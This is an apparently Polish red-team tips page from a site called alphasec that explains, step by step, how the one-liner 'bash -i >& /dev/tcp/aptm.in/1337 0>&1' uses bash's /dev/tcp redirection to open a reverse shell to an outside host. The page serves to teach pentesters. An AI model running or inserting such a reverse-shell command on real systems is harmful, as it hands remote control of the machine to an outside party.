alphasec
Bash / Unix protip 0002
in 𝕏

Reverse shell w bashu

tty1 · bash
$ bash -i >& /dev/tcp/aptm.in/1337 0>&1
#Bash#RedTeam#ReverseShell

Kiedy bash skompilowany jest z opcją --enable-net-redirections (co jest zwykle prawdą), użytkownik może wykonywać polecenia na pseudo urządzeniach /dev/tcp// oraz analogicznie /dev/udp//, co spowoduje otwarcie połączeń tcp lub udp na : i przekierowanie tam wejścia/wyjścia.

W powyższym przykładzie:

Jak to działa — krok po kroku

Rozłóżmy onelinera na czynniki pierwsze:

bash -i

uruchomienie interaktywnego shella

>& /dev/tcp/aptm.in/1337

przekierowanie standardowego wyjścia (STDOUT - 1) i wyjścia błędów (STDERR - 2) do hosta aptm.in na port 1337/TCP

0>&1

przekierowanie wejścia (STDIN - 0) do tego samego deskryptora co STDOUT - 1

Przydatne linki

- https://www.tldp.org/LDP/abs/html/devref1.html web ↗
← poprzedni protip 0001 ••• Wszystkie protipy następny → protip 0003
// subskrybuj

Nowe protipy prosto na maila.

Mięsiste jednolinijkowce i triki z prawdziwych zleceń. Zero spamu, zero teorii. Wypisujesz się jednym kliknięciem.

wersja newslettera: